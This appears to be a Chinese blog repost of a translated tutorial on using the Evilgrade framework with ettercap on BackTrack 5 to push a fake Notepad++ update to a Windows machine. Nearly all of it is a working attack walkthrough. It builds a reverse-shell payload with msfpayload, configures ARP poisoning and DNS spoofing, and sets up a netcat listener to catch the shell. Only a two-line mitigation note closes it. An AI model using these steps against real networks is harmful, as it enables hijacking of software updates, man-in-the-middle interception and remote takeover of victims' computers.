首先声明下,这是我转转自红盟的一篇文章,原文链接在这里:http://www.cnhonkerarmy.com/thread-78296-1-1.html

这篇文章是我无意中看见的evligrade的一个利用教程,由于是英文的所以翻译给大家看看!感觉对大家的认识和提高都有很多的作用,其实漏洞无处不在!开拓我们的思维,才是关键!
    好了,废话不多说!
---------------------------------------------------
此文摘自:http://vishnuvalentino.com/compu ... 2-0-on-backtrack-5/

作者:Vishnu Valentino
翻译:L.N.

题目:在backtrack5上用Evilgrade工具15步**windows

文章类型:辅导类

难度:中高级

evilgrade简介:
  evilgrade是一个模块化的框架结构,使用者可以利用脆弱的软件的升级更新机制,来欺骗用户安装自己注入的其他程序(***、病毒)。它提供了代理和默认快速配置,还有web服务和dns服务模块,可以很容易的更新设置,并且还可以自动配置新的代理!

来自:http://www.infobytesec.com

使用工具:
1. Evilgrade
2. Backtrack 5

步骤:
1.解压evilgrade然后运行它用下面的命令

  1. tar xvfz isr-evilgrade-2.0.0.tar.gz
  2. cd isr-evilgrade-2.0.0.tar.gz/
  3. ./evilgrade

复制代码

如果你在使用evilgrade的时候出现了错误,你可以参考http://vishnuvalentino.com/tips- ... backtrack-5-solved/这篇文章
下面显示的这个图片是你正确运行时的样子

2.下一步你需要去确定一个应用的目标程序,因为evilgrade将创建一个假的更新注入到目标电脑。使用下面的命令查看可以支持应用的模块。

  1. evilgrade>show modules

复制代码

(命令是show modules,不要evilgrade>也输入进去了,这个便是当前的目录)

  1. List of modules:
  2. ===============
  3. allmynotes
  4. amsn
  5. appleupdate
  6. apptapp
  7. apt
  8. atube
  9. autoit3
  10. bbappworld
  11. blackberry
  12. bsplayer
  13. ccleaner
  14. clamwin
  15. cpan
  16. cygwin
  17. dap
  18. divxsuite
  19. express_talk
  20. fcleaner
  21. filezilla
  22. flashget
  23. flip4mac
  24. freerip
  25. getjar
  26. gom
  27. googleanalytics
  28. growl
  29. isopen
  30. istat
  31. itunes
  32. jet
  33. jetphoto
  34. linkedin
  35. miranda
  36. mirc
  37. nokia
  38. nokiasoftware
  39. notepadplus
  40. openoffice
  41. opera
  42. orbit
  43. osx
  44. paintnet
  45. panda_antirootkit
  46. photoscape
  47. quicktime
  48. skype
  49. sparkle
  50. speedbit
  51. sunbelt
  52. sunjava
  53. superantispyware
  54. teamviewer
  55. techtracker
  56. trillian
  57. ubertwitter
  58. vidbox
  59. virtualbox
  60. vmware
  61. winamp
  62. winscp
  63. winupdate
  64. winzip
  65. yahoomsn
  66. - 63 modules available.

复制代码

在这篇辅导文章中,我将使用的目标程序是notepad plus,因此当管理员不加思索的升级这个应用程序的时候,他讲掉进我的陷阱里面。使用这个模块,运行以下命令:

  1. evilgrade>configure notepadplus

复制代码

3.查看选项,你可以使用show options这个命令

在上面的图片中,virtualhost是当管理员升级他的notepad plus时,就会打开这个url连接:notepad-plus.sourceforge.net。下面我们将使用到这个连接。

4.接下来我们设置一个代理。我们配置一个代理用msfpayload创建一个shell_reverse_tcp

  1. evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

复制代码

解释:
/pentest/exploits/framework3/msfpayload –> 我们将加载这个msfpayload
windows/shell_reverse_tcp –> 当成功的时候我们就可以反弹一个shell回本地

LHOST –> localhost 你backtrack5的ip地址 / ***者的ip地址.
LPORT –> 填一个端口(用于监听) (相关的说明可以看http://www.infobytesec.com/down/isr-evilgrade-Readme.txt)

5.下一步是我们打开evilgrade服务。确保你的80端口是打开的

6.完成了evilgrade得设置过后,我们还需要配置中间人***用ettercap,然后当当管理员升级notpad plus时就会直接连接evilgrade服务。第一步是你需要配置etter.dns

  1. pico /usr/share/ettercap/etter.dns

复制代码

notepad-plus.sourceforge.net –> 这个地址是我们在第三步得到的

7.接下来我们要用到ettercap
“ettercap是什么见http://ettercap.sourceforge.net/”

运行ettercap,打开新的terminal(ctrl+alt+t)运行下面的命令

  1. ettercap -G

复制代码

Click Sniff –> Unified sniffing –> 选着你的网卡,在这儿我用eth0.

8.下一步我们需要使用dns_spoof插件,这个插件用于接收目标机器对evilgrade服务的请求。点击 Plugins –> Manage the plugins –> 双击 dns_spoof 

9.下一步是扫描主机,这部是我们去决定一个目标,点击Hosts –> Scan for 

10.下面是我们网络中得所有主机,我们需要建议一个目标

11.我们还需要去完成中间者***去拦截网络中得数据,点击 Mitm –> Arp poisoning –> 点击 "Sniff remote connection".

12.如果上面的每一步都设置正确,就运行ettercap开始嗅探start sniffing

13.接下来我们用nc(netcat)去监听端口1234(这个端口就是我们上面设置的那个)
nc是什么我就不多说了不知道的见:From : http://netcat.sourceforge.net/

新打开一个terminal(ctrl+alt+t)并且运行命令

  1. nc -l -v -p 1234

复制代码

14.当管理员打开notepad plus时就会被要求升级更新,如下面的图,如果管理员点击yes,就成功了

15.我们的nc就会有东西回显了,因为当管理员点击yes升级完成的时候,我们反弹的shell就成功了

应对方法:
1.直接到官方网站下载最新版本的程序

2.保持反病毒程序是最新的

希望对你有帮助

转载于:https://blog.51cto.com/3135888/1193926

【翻译】在backtrack5上用Evilgrade工具15步**windows相关推荐

  1. qt 增加的翻译没有作用上_Qt语言翻译工具的使用 及 QT-Linguist国际化的简单实现...

    通过使用Qt Linguist工具时,可以有两种方式进行下一步操作(Windows操作系统).首先说明第一种,在一个软件系统中存在*.pro的工程文件,因而我们可以借此通过采用命令行的形式生成最终所需 ...

  2. 图片翻译文字怎么弄,分享几个怎么翻译图片上的文字工具

    我们平时在工作或学习中,经常要面对很多陌生的文档和图片,而为了工作能正常进行下去,每次都是将不懂的词汇一个个手动去搜索,但是这样的方法效率真的很低,况且有时候搜索个别不懂的词语并不能完全的理解全文.所 ...

  3. mac上编码转换工具_25个用于高效编码的Mac工具

    mac上编码转换工具 by freeCodeCamp 通过freeCodeCamp 25个用于高效编码的Mac工具 (25 Mac Tools for Productive Coding) 1.现代浏 ...

  4. CENTOS上的网络安全工具(十四)搬到Docker上(2)?

    既然说要搬到Docker上,那么肯定是要把咱日常习惯用的那些东西都往docker上堆一堆看的.我最先考虑的居然是SSH,乃至于到现在我都不知道我为什么第一个想到的是SSH--因为对虚拟机来说,首先考虑 ...

  5. 我的 Windows Vista 上安装的工具

    1.虚拟光驱:如果说Daemon Tools最强最好用的虚拟光驱软件一点也不为过,看看各大下载站点对它的等级评价以及说明就知道了.它安装后安装完成后只有右下角任务栏的一个小图标,系统资源占用率极小. ...

  6. 日常英语---五、英语句子翻译和读的选择什么工具好

    日常英语---五.英语句子翻译和读的选择什么工具好 一.总结 一句话总结:英语翻译用有道+google啊,找相似句啊,读的话要google 翻译:有道+google 找相似句 读:google 1.后 ...

  7. 【翻译】25个浏览器开发工具的秘密

    原文:http://www.andismith.com/blog/2011/11/25-dev-tool-secrets/ 作者:Andi Smith 翻译:25个浏览器开发工具的秘密 开发 过去几年 ...

  8. CENTOS上的网络安全工具(十六)容器特色的Linux操作

    这一篇,我们继续在Docker上折腾.之前我们已经展示了如何在容器上搭建安全产品的部署环境,这里我们需要更进一步,讨论如何在容器上搭建开发与调试环境.这是学习安全产品并且自己构建安全产品的基础步骤. ...

  9. 在pc端上操作手机工具分享

    在pc端上操作手机工具分享 今天要跟大家分享的工具名字叫scrcpy(来源于GitHub) scrcpy可以通过usb或是(Tcp/IP)来连接安卓设备,并且不需要root权限,程序支持GNU/Lin ...

最新文章

  1. 安装python及web.py
  2. MySQL 查询重复数据,删除重复数据保留id最小的一条作为唯一数据
  3. 深度前沿:对话管理模型研究最新进展
  4. docker-compose(入门,与docker的区别)
  5. Magento教程 18:Magento功能导览(2) 展示商品
  6. 并发重复请求,这才是优雅的处理方式!
  7. Navicat操作SQL server 2008R2文件.bak文件还原
  8. java对象占用内存的说法_JAVA 中关于对象成员占用内存的说法哪个正确 (3.0分)_学小易找答案...
  9. 程序异常自动生成DMP文件
  10. python与建筑结构设计_29个常见的结构设计问题盘点
  11. Angularjs的http请求
  12. layui table 渲染动态列及列数据
  13. Nginx-浅析(转)
  14. 【密码学】C 语言实现 RSA 模幂运算
  15. android点击按钮静音,android 实现一键静音功能
  16. android手机 垃圾箱,Dumpster Pro「回收站」v3.6.386 for Android 直装解锁高级版 —— 一款不错的 Android 垃圾箱 / 回收站应用...
  17. mysql还原.bak文件
  18. Aegisub精细处理字幕文件
  19. 函数周期表丨EXCEPT
  20. IDL学习:语法基础-变量

热门文章

  1. 失去手臂五年后,这个仿生机械臂帮他重拾钢琴曲演奏
  2. 云计算作业001-电脑配置
  3. 开启3389常用终端命令
  4. 华为交换机VRP用户界面配置及Telnet登录实验
  5. 桌面虚拟化之应用程序的整合
  6. 真不好意思,让你贱笑了
  7. 续航超600km新能源汽车扎堆发布,零部件供应商“放血”,这届车展都拼了...
  8. 你还不会小程序啊?手把手带你做第一个和服务器交互的小程序
  9. 常用排序算法(八)桶排序
  10. 写好代码,拒绝一传到底的参数类